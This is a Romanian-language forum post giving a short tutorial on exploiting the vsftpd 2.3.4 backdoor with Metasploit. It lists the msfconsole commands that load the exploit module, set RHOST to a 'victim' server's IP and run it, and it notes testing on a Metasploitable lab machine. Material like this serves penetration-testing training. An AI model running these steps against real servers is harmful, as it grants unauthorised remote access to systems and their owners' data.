Jump to content
mDOS

Exploatare server VSFTPD

Recommended Posts

Ce ne trebuie:

-Linux

-Metasploit Framework

 

1.Deschidem terminalul sau shell-ul si scriem in el "msfconsole". (https://imgur.com/a/ZxWjcoM)

 

 Acesta este backdoor-ul pe care il vom folosii in tutorial :"exploit/unix/ftp/vsftpd_234_backdoor"

 

2.use exploit/unix/ftp/vsftpd_234_backdoor.

 

3.Set RHOST ip-ul victimei/serverului (aceasta comanda este folosita pentru a seta hostul victimei/serverului)

 

4. exploit (ruleaza exploitul)

Cam asa ar trebuii sa arate atacul nostru: https://imgur.com/yTmv7AM

 

ATENTIE:

Acest exploit a fost testat pe o masina virtuala(Metasploitable)

 

 

 

 

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...